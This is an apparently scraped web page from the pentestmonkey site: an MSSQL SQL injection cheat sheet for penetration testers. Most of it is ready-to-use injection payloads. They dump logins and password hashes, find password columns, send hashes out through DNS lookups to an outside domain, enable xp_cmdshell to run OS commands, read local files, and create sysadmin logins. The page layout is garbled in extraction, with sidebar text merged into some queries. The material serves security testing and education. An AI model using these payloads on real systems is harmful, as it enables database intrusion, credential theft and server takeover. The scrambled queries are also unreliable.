## pentestmonkey Taking the monkey work out of pentesting Site News Blog **Cheat Sheets** Tools Yaptest Contact MSSQL Injection Cheat Sheet Some useful syntax reminders for SQL Injection into MSSQL databases... Categories This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are • Blog (78) lacking for each database, and enumeration techniques that don't apply and also areas that I haven't got round to researching yet. Cheat Sheets (10) • Shells (1) The complete list of SQL Injection Cheat Sheets I'm working is: • SQL Injection (7) Oracle Contact (2) MSSQL • Site News (3) MySQL • Tools (17) PostgreSQL Ingres Audit (3) • DB2 • Misc (7) • Informix User Enumeration I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here. (4) • Web Shells (3) Some of the queries in the table below can only be run by an admin. These are marked with "- priv" at the end of the Uncategorized (3) query. Yaptest (15) SELECT @@version Version • Front End (1) • Installing (2) SELECT 1 — comment Comments SELECT /\*comment\*/1 Overview (2) • Using (8) **Current User** SELECT user\_name(); SELECT system\_user; SELECT user; SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID SELECT name FROM master..syslogins List Users SELECT name, password FROM master..sysxlogins — priv, mssql 2000; List Password SELECT name, master.dbo.fn varbintohexstr(password) FROM master..sysxlogins — Hashes priv, mssql 2000. Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer. SELECT name, password\_hash FROM master.sys.sql\_logins — priv, mssql 2005; SELECT name + '-' + master.sys.fn\_varbintohexstr(password\_hash) from master.sys.sql\_logins — priv, mssql 2005 MSSQL 2000 and 2005 Hashes are both SHA1-based. phrasen|drescher can crack Password Cracker these. List Privileges — current privs on a particular object in 2005, 2008 SELECT permission\_name FROM master..fn\_my\_permissions(null, 'DATABASE'); current database SELECT permission\_name FROM master..fn\_my\_permissions(null, 'SERVER'); current server SELECT permission\_name FROM master..fn\_my\_permissions('master..syslogins', 'OBJECT'); -permissions on a table SELECT permission\_name FROM master..fn\_my\_permissions('sa', 'USER'); -permissions on a user- current privs in 2005, 2008 SELECT is\_srvrolemember('sysadmin'); SELECT is\_srvrolemember('dbcreator'); SELECT is\_srvrolemember('bulkadmin'); SELECT is\_srvrolemember('diskadmin'); SELECT is\_srvrolemember('processadmin'); SELECT is\_srvrolemember('serveradmin'); SELECT is\_srvrolemember('setupadmin'); SELECT is\_srvrolemember('securityadmin'); — who has a particular priv? 2005, 2008 SELECT name FROM master..syslogins WHERE denylogin = 0; SELECT name FROM master..syslogins WHERE hasaccess = 1; SELECT name FROM master..syslogins WHERE isntname = 0; SELECT name FROM master..syslogins WHERE isntgroup = 0; SELECT name FROM master..syslogins WHERE sysadmin = 1; SELECT name FROM master..syslogins WHERE securityadmin = 1; SELECT name FROM master..syslogins WHERE serveradmin = 1; SELECT name FROM master..syslogins WHERE setupadmin = 1; SELECT name FROM master..syslogins WHERE processadmin = 1; SELECT name FROM master..syslogins WHERE diskadmin = 1; SELECT name FROM master..syslogins WHERE dbcreator = 1; SELECT name FROM master..syslogins WHERE bulkadmin = 1; SELECT is\_srvrolemember('sysadmin'); — is your account a sysadmin? returns 1 for List DBA true, 0 for false, NULL for invalid role. Also try 'bulkadmin', 'systemadmin' and other Accounts values from the documentation SELECT is\_srvrolemember('sysadmin', 'sa'); — is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username. SELECT name FROM master..syslogins WHERE sysadmin = '1' — tested on 2005 SELECT DB\_NAME() Current Database SELECT name FROM master..sysdatabases; List Databases SELECT DB\_NAME(N); — for N = 0, 1, 2, ...SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE List Columns name = 'mytable'); — for the current DB only SELECT master..syscolumns.name, TYPE\_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; — list colum names and types for master..sometable SELECT name FROM master..sysobjects WHERE xtype = 'U'; — use xtype = 'V' for List Tables views SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U'; SELECT master..syscolumns.name, TYPE\_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; — list colum names and types for master..sometable — NB: This example works only for the current database. If you wan't to search another Find Tables db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects). From Column SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM Name sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' — this lists table, column for each column containing the word 'password' SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER Select Nth Row BY name ASC) sq ORDER BY name DESC — gets 9th row Select Nth Char SELECT substring('abcd', 3, 1) — returns c SELECT 6 & 2 — returns 2 Bitwise AND SELECT 6 & 1 — returns 0 ASCII Value -> SELECT char(0x41) — returns A Char Char -> ASCII SELECT ascii('A') – returns 65 Value SELECT CAST('1' as int); Casting SELECT CAST(1 as char) String SELECT 'A' + 'B' – returns AB Concatenation IF (1=1) SELECT 1 ELSE SELECT 2 — returns 1 If Statement Case Statement SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END — returns 1 **Avoiding Quotes** SELECT char(65)+char(66) — returns AB Time Delay WAITFOR DELAY '0:0:5' — pause for 5 seconds declare @host varchar(800); select @host = name FROM master..syslogins; Make DNS exec('master..xp getfiledetails "\' + @host + 'c\$boot.ini"'); — nonpriv, works on Requests 2000declare @host varchar(800); select @host = name + '-' + master.sys.fn\_varbintohexstr(password\_hash) + '.2.pentestmonkey.net' from sys.sql logins; exec('xp fileexist "\' + @host + 'c\$boot.ini"); — priv, works on 2005– NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary. — Also check out the DNS tunnel feature of sqlninja EXEC xp\_cmdshell 'net user'; — privOn MSSQL 2005 you may need to reactivate Command xp\_cmdshell first as it's disabled by default: Execution EXEC sp\_configure 'show advanced options', 1; — priv RECONFIGURE; — priv EXEC sp\_configure 'xp\_cmdshell', 1; — priv RECONFIGURE; — priv Local File CREATE TABLE mydata (line varchar(8000)); BULK INSERT mydata FROM 'c:boot.ini'; Access DROP TABLE mydata; SELECT HOST\_NAME() Hostname, IP Address EXEC sp\_addlogin 'user', 'pass'; — priv Create Users **Drop Users** EXEC sp\_droplogin 'user'; — priv Make User DBA EXEC master.dbo.sp\_addsrvrolemember 'user', 'sysadmin; — priv Location of DB EXEC sp\_helpdb master; -location of master.mdf EXEC sp\_helpdb pubs; -location of pubs.mdf files Default/System northwind Databases model msdb pubs — not on sql server 2005 tempdb Misc Tips In no particular order, here are some suggestions from pentestmonkey readers. From Dan Crowley: A way to extract data via SQLi with a MySQL backend From Jeremy Bae: Tip about sp\_helpdb – included in table above. From Trip: List DBAs (included in table above now): select name from master..syslogins where sysadmin = '1' From Daniele Costa: Tips on using fn\_my\_permissions in 2005, 2008 – included in table above. Also: To check permissions on multiple database you will have to use the following pattern. USE [DBNAME]; select permission\_name FROM fn\_my\_permissions (NULL, 'DATABASE') Note also that in case of using this data with a UNION query a collation error could occur. In this case a simple trick is to use the following syntax: select permission\_name collate database\_default FROM fn\_my\_permissions (NULL, 'DATABASE') • cheatsheet, mssql, sqlinjection SQL Injection Breaking Out of a Chroot Jail Using PERL Oracle SQL Injection Cheat Sheet

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